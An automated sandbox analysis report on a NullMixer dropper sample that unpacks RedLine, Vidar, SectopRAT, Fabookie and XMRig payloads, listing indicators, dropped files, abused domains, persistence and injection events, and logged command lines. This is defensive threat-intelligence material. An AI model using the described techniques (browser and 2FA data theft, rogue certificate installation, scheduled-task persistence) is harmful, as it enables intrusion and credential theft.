Malware Analysis Report

2025-01-02 06:04

Sample ID 241126-sdd2raslhq
Target a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118
SHA256 6430e35390b94f25e609d8dc2edadd8f6b0b30bec768ce894c67028de438ab13
Tags
fabookie nullmixer redline sectoprat vidar olk aspackv2 discovery dropper infostealer rat spyware stealer trojan upx xmrig miner
score
10/10

Analysis Overview

Threat Level: Known bad

The file a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

RedLine payload

Fabookie

Fabookie family

SectopRAT payload

xmrig

Xmrig family

Nullmixer family

SectopRAT

Vidar

Redline family

Sectoprat family

RedLine

NullMixer

Vidar family

Detect Fabookie payload

Detected Nirsoft tools

XMRig Miner payload

Vidar Stealer

ASPack v2.12-2.42

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Looks up external IP address via web service

Accesses 2FA software files, possible credential harvesting

UPX packed file

Suspicious use of SetThreadContext

Drops file in Windows directory

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Program crash

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Checks processor information in registry

Suspicious use of WriteProcessMemory

Analysis: static1

Detonation Overview

Reported

2024-11-26 15:00

Signatures

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-26 15:00

Reported

2024-11-26 15:02

Platform

win7-20241023-en

Max time kernel

58s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe"

Signatures

Detect Fabookie payload

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

RedLine

infostealer redline

RedLine payload

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Sectoprat family

sectoprat

Vidar

stealer vidar

Vidar family

vidar

Detected Nirsoft tools

Vidar Stealer

stealer

ASPack v2.12-2.42

aspackv2

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\winnetdriv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_2.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2952 set thread context of 1664 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe

UPX packed file

upx

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5H5CV.tmp\jobiea_5.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob elided] C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob elided] C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_3.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 1548 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC0678A96\jobiea_1.exe

jobiea_1.exe

